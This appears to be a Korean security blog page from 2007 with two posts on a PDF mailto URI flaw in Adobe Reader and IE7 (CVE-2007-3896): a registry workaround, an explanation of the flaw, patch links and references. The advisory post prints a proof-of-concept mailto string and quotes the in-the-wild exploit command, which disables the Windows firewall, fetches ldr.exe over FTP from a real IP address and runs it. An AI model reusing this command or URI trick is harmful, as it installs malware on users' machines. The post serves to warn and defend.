'Adobe'에 해당되는 글 2건
- 2007/10/29 Adobe pdf 파일을 이용한 해킹(hacking)에 대한 패치
- 2007/10/24 PDF 잘못된 URI 설정을 사용한 공격: PDF 파일 함부로 열지 말자
해당 파일을 실행하면 Adobe pdf 파일의 메일 링크를 열지 않도록 한다.
아직까지 IE7 패치가 나오지 않은 이상 간단하지만 강력한 보안 책이다.
공격은 첨부된 pdf 파일을 단지 더블 클릭하면 실행되고, 임시 파일에 ftp 명령어를 써 넣은뒤 cmd.exe를 통해서 실행 시키는 방식이다.
해당 reg 파일을 통한 패치는 adobe pdf 리더의 이러한 mail 링크 기능을 임시로 죽여 주는 역할을 한다.
Ignore.reg이 파일을 다운로드 해서 실행 시켜 주기만 하면 된다.
공격에 대한 자료는 2007/10/24 - [일/취약점 경보] - PDF 잘못된 URI 설정을 사용한 공격: PDF 파일 함부로 열지 말자 를 참조하기 바란다.
'취약점 경보' 카테고리의 다른 글
| RealPlayer 보안 업데이트 (0) | 2007/11/02 |
|---|---|
| 곰플레이어 취약점의 간단한 해결 방법 (0) | 2007/10/31 |
| Adobe pdf 파일을 이용한 해킹(hacking)에 대한 패치 (0) | 2007/10/29 |
| 무선 랜 해킹 지도를 그리자 (0) | 2007/10/24 |
| PDF 잘못된 URI 설정을 사용한 공격: PDF 파일 함부로 열지 말자 (0) | 2007/10/24 |
| 2007년 10월 MS 패치 분석 (0) | 2007/10/12 |
문서 교환을 위해 자주 사용되는 pdf 파일을 이용한 취약점이 발견되었다.
원리는 간단하게 다음과 같다. pdf에서 mailto 태그를 처리하는 루틴에서 %를 사용하여 명령이 escape되는 것 때문입니다.
mailto:test%../../../../windows/system32/calc.exe".cmd
취약한 대상은 다음과 같다.
Windows Server 2003 and Windows XP with Internet Explorer 7 installed
Adobe 제품군 뿐만 아니라 Firefox,Outlook,Outlook Express,Netscape 웹브라우저,Skype까지 이 공격에 취약하다고 한다. 근본적인 문제는 IE7에 있고, 그 ShellExecute 컴포넌트를 이용하는 모든 프로그램이 취약하다고 볼 수 있다.
미국 현지 시간으로 10월 23일 Full Disclosure에서 돌아 다니는 exploit의 command line이 공개 되었다. 익스플로잇은 특정 사이트의 ftp 사이트에 접속하여 ldr.exe라는 바이너리를 다운로드 하여 실행 시키는 역할을 한다.
mailt0:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat"
PS. mailt0 == mailto
실제 떠돌고 있는 악성 pdf 파일을 실행한 화면은 다음과 같다.
Pdf 취약점은 간단하게 exploit이 가능하므로 알지 못하는 사람으로 부터 전달된 pdf 파일은 되도록 열지 않는 것이 좋다.
Fixes
다음 제품에 대한 업데이트를 설치할 수 있다.
Adobe Reader 8.1.1 update files
http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows
Acrobat 8.1.1 update files
http://www.adobe.com/support/downloads/product.jsp?product=1&platform=Windows
Adobe 8 버전 이하의 제품에 대한 패치는 현재 제공되지 않고, 어도비 공식 사이트에서는 레지스트리 설정을 변경하는 방법을 권고하고 있다.
내가 만든 패치: 2007/10/29 - [일/취약점 경보] - Adobe pdf 파일 공격에 대한 패치
References
http://spacebunny.xepher.net/hack/shellexecutefiasco/
http://www.heise-security.co.uk/news/97462
http://www.heise-security.co.uk/news/97246
http://www.heise-security.co.uk/news/97139
http://www.heise-security.co.uk/news/97094
http://www.heise-security.co.uk/news/96982
http://www.heise-security.co.uk/news/93470
http://www.microsoft.com/technet/security/advisory/943521.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3896
http://www.securityfocus.com/bid/25748
http://seclists.org/fulldisclosure/2007/Oct/0730.html
http://it.slashdot.org/article.pl?sid=07/10/18/1533222&from=rss
'취약점 경보' 카테고리의 다른 글
| RealPlayer 보안 업데이트 (0) | 2007/11/02 |
|---|---|
| 곰플레이어 취약점의 간단한 해결 방법 (0) | 2007/10/31 |
| Adobe pdf 파일을 이용한 해킹(hacking)에 대한 패치 (0) | 2007/10/29 |
| 무선 랜 해킹 지도를 그리자 (0) | 2007/10/24 |
| PDF 잘못된 URI 설정을 사용한 공격: PDF 파일 함부로 열지 말자 (0) | 2007/10/24 |
| 2007년 10월 MS 패치 분석 (0) | 2007/10/12 |
Prev
Rss Feed